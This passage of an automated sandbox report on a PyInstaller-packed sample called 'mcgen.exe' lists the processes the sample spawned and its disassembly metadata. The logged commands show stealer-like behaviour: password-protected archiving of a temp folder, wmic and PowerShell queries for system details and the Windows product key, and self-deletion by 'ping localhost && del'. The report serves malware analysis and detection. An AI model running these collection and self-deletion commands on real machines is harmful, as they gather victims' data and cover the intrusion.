Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7934f0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	03:22:29
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
Imagebase:	0x7ff695cd0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	03:22:30
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	03:22:30
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	03:22:31
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	03:22:32
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	03:22:32
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	03:22:32
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	03:22:33
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8016, Parent PID: 8160

General

Target ID:	111
Start time:	03:22:33
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	03:22:33
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	03:22:34
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	03:22:34
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	03:22:35
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	117
Start time:	03:22:35
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3840, Parent PID: 6564

General

Target ID:	118
Start time:	03:22:35
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	03:22:35
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	120
Start time:	03:22:37
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	03:22:37
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	03:22:37
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	123
Start time:	03:22:40
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe""
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	124
Start time:	03:22:40
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	125
Start time:	03:22:41
Start date:	02/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 3
Imagebase:	0x7ff7d4f50000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17%
Total number of Nodes:	2000
Total number of Limit Nodes:	33

Executed Functions

Function 00007FF6B9F18BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B9F19400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B9F145E4,00000000,00007FF6B9F11985), ref: 00007FF6B9F19439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18C46

Part of subcall function 00007FF6B9F2A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2A500

Part of subcall function 00007FF6B9F2878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F287F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18CD6
CreateProcessW.KERNELBASE ref: 00007FF6B9F18D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18D18

Part of subcall function 00007FF6B9F12C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12C9E
Part of subcall function 00007FF6B9F12C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12D63
Part of subcall function 00007FF6B9F12C50: MessageBoxW.USER32 ref: 00007FF6B9F12D99

RegisterClassW.USER32 ref: 00007FF6B9F18D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18D7B
CreateWindowExW.USER32 ref: 00007FF6B9F18DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18E05
PeekMessageW.USER32 ref: 00007FF6B9F18E29
TranslateMessage.USER32 ref: 00007FF6B9F18E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18E41
PeekMessageW.USER32 ref: 00007FF6B9F18E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F18FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF6B9F19009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F19012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6B9F13F7F), ref: 00007FF6B9F1901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF6B9F18D44
PyInstaller Onefile Hidden Window, xrefs: 00007FF6B9F18D85
Failed to create child process!, xrefs: 00007FF6B9F18D20
CreateProcessW, xrefs: 00007FF6B9F18D27

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 98dcccba2711abca994aef8fa64f4333f204820b35811ecbe5e3d1a3f9304713
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: BDD18572A08B9286EB209F78E8542BD3768FF85BAAF500235DB5D836A4DF3CD145C741

Function 00007FF6B9F11000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

bye-runtime-tmpdir, xrefs: 00007FF6B9F13B68
Failed to start splash screen!, xrefs: 00007FF6B9F13ED4
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6B9F13D12
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6B9F13EBB
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6B9F13971
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6B9F13A0B, 00007FF6B9F13CD4, 00007FF6B9F13F6B
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6B9F13C61
Failed to convert DLL search path!, xrefs: 00007FF6B9F13DDC
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6B9F13882, 00007FF6B9F138AF
_PYI_SPLASH_IPC, xrefs: 00007FF6B9F13A23, 00007FF6B9F13EF5
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6B9F13A17, 00007FF6B9F13A2F, 00007FF6B9F13A9B
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6B9F13D35
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6B9F13E0A
Py_GIL_DISABLED, xrefs: 00007FF6B9F13AF4
Failed to load splash screen resources!, xrefs: 00007FF6B9F13E85
VCRUNTIME140.dll, xrefs: 00007FF6B9F13DB1
MEI, xrefs: 00007FF6B9F13933
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6B9F13EA6
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6B9F13BE8
Could not create temporary directory!, xrefs: 00007FF6B9F13CBF
Failed to remove temporary directory: %s, xrefs: 00007FF6B9F13FC3
pkg, xrefs: 00007FF6B9F139BE
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6B9F139DE
pyi-python-flag, xrefs: 00007FF6B9F13AD6
_PYI_ARCHIVE_FILE, xrefs: 00007FF6B9F138D2, 00007FF6B9F139FF
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6B9F13B32
pyi-contents-directory, xrefs: 00007FF6B9F13B8D
pyi-disable-windowed-traceback, xrefs: 00007FF6B9F13BB2

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: e0b1f9155b3603635f161de1b17827032b7743c1fa0fa9248d3b63a24b6fabb3
Instruction ID: 135fa4c788c9026630f2cee632232ada895aba3aba885dcbd0220dcff0b655a6
Opcode Fuzzy Hash: e0b1f9155b3603635f161de1b17827032b7743c1fa0fa9248d3b63a24b6fabb3
Instruction Fuzzy Hash: 5E32B1A1E0C6B252FB25DF3994543B96699AF467A2F844032DB5DC32C2EF6CE558C380

Function 00007FF6B9F369D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B9F36708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F36749
Part of subcall function 00007FF6B9F36708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F367C7
Part of subcall function 00007FF6B9F36708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F36818

CreateFileW.KERNELBASE ref: 00007FF6B9F36ADA
CreateFileW.KERNEL32 ref: 00007FF6B9F36B2A
GetLastError.KERNEL32 ref: 00007FF6B9F36B5A
GetFileType.KERNELBASE ref: 00007FF6B9F36B6F
GetLastError.KERNEL32 ref: 00007FF6B9F36B79
CloseHandle.KERNEL32 ref: 00007FF6B9F36BAC
CloseHandle.KERNEL32 ref: 00007FF6B9F36D0F
CreateFileW.KERNEL32 ref: 00007FF6B9F36D44
GetLastError.KERNEL32 ref: 00007FF6B9F36D53

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 3a7869cc3003580e969181492753bc0c8568c4aa9f79d8b235a2c8f0c9486d47
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 1EC1AE36B28A4585EB20DFB9C4912BC3769FB49BA9B115229DB2E9B7D4CF3CD451C300

Function 00007FF6B9F183B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F1841B
RemoveDirectoryW.KERNEL32(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F1849E
DeleteFileW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184BD
FindNextFileW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184CB
FindClose.KERNEL32(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184DC
RemoveDirectoryW.KERNELBASE(?,00007FF6B9F18B09,00007FF6B9F13FA5), ref: 00007FF6B9F184E5

Strings

%s\*, xrefs: 00007FF6B9F183E2

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 83dc515342b86f3fa047209b2e4ff4baba44334c6e76303dfa23ae0d2a6f8301
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 3841A261A0C96285EA309F2CE5541B96368FB967B6F900232DB9DC36C4DF3CD64AC784

Function 00007FF6B9F192F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6B9F19323
FindClose.KERNELBASE ref: 00007FF6B9F19332

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: b3ea566682a51e8eb3ed45d42fb5dc2372e038feaf4315717f3b97c8d8ec95b6
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 78F0A462A1865186F7608F68B4587766358FB85376F040235DB6D436D4DF3CD0488A40

Function 00007FF6B9F30938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: e5eb24155a61963c220474134b41d46031fe31647c564cf4bd7aab05120218e5
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: 3802AE21A1D68640FE65AF3E9410279369CAF46BB2F598636EF5DC73D2DE3CE4418302

Function 00007FF6B9F11950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B9F17F80: _fread_nolock.LIBCMT ref: 00007FF6B9F1802A

_fread_nolock.LIBCMT ref: 00007FF6B9F11A1B

Part of subcall function 00007FF6B9F12910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B9F11B6A), ref: 00007FF6B9F1295E

Strings

Failed to read cookie!, xrefs: 00007FF6B9F11A2B
Could not allocate memory for archive structure!, xrefs: 00007FF6B9F11A61
Could not allocate buffer for TOC!, xrefs: 00007FF6B9F11B1B
calloc, xrefs: 00007FF6B9F11A68
MEI, xrefs: 00007FF6B9F11991
Could not read full TOC!, xrefs: 00007FF6B9F11B55
fseek, xrefs: 00007FF6B9F119F5
Error on file., xrefs: 00007FF6B9F11B8D
malloc, xrefs: 00007FF6B9F11B22
Failed to seek to cookie position!, xrefs: 00007FF6B9F119EE
fread, xrefs: 00007FF6B9F11A32, 00007FF6B9F11B5C

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

